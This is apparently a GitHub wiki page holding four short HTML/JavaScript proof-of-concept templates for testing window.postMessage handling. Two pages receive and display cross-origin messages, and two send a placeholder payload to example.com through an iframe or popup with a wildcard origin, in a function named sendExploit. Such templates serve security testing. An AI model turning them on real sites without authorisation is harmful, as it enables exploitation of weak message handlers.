-
Notifications
You must be signed in to change notification settings - Fork 5
Home
Physics edited this page Feb 20, 2020
·
4 revisions
<html>
<body>
<script>
function recvMessage(event){
var msg;
msg = "Message from : " + event.origin;
msg += "\nContaining : " + JSON.stringify(event.data);
alert(msg);
}
window.addEventListener("message", recvMessage);
</script>
<iframe src="https://www.example.com/"></iframe>
</body>
</html><html>
<body>
<iframe src="https://www.example.com/"></iframe>
<script>
function sendExploit() {
var payload = {"key1":"val1","key2":"val2"};
target.postMessage(JSON.stringify(payload),"*");
}
var target = document.getElementsByTagName("iframe")[0].contentWindow;
setTimeout(sendExploit,3000); // wait 3 seconds to allow the page to load
</script>
</body>
</html><html>
<body>
<script>
function recvMessage(event){
var msg;
msg = "Message from : " + event.origin;
msg += "\nContaining : " + JSON.stringify(event.data);
alert(msg);
}
window.addEventListener("message", recvMessage);
var target = window.open("https://www.example.com/");
</script>
</body>
</html><html>
<body>
<script>
var target = window.open("https://www.example.com/");
function sendExploit() {
var payload = {"key1":"val1","key2":"val2"};
target.postMessage(JSON.stringify(payload),"*");
}
setTimeout(sendExploit,3000); // wait 3 seconds to allow the page to load
</script>
</body>
</html>